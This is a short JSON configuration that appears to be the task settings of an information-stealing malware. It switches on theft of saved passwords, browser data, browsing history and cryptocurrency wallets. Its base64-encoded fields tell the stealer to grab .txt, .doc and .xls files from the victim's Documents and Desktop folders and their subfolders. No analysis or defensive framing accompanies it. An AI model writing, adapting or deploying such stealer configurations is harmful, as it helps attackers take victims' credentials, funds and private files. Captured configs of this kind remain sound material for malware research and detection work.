{"isDouble":true,"isSavedPasswords":true,"isBrowserData":true,"isBrowserHistory":true,"isWallets":true,"isSkype":false,"isTelegram":false,"isSteam":false,"isScreenshot":false,"isDelete":false,"files":{"0":{"fgName":"Mg==","fgPath":"JVVTRVJQUk9GSUxFJVxEb2N1bWVudHNc","fgMask":"Ki50eHQsKi5kb2MqLCoueGxzKg==","fgMaxsize":"MzA=","fgSubfolders":true,"fgShortcuts":false,"fgExceptions":""},"1":{"fgName":"MQ==","fgPath":"JVVTRVJQUk9GSUxFJVxEZXNrdG9wXA==","fgMask":"Ki50eHQsKi5kb2MqLCoueGxzKg==","fgMaxsize":"MzA=","fgSubfolders":true,"fgShortcuts":false,"fgExceptions":""}},"loader":{}}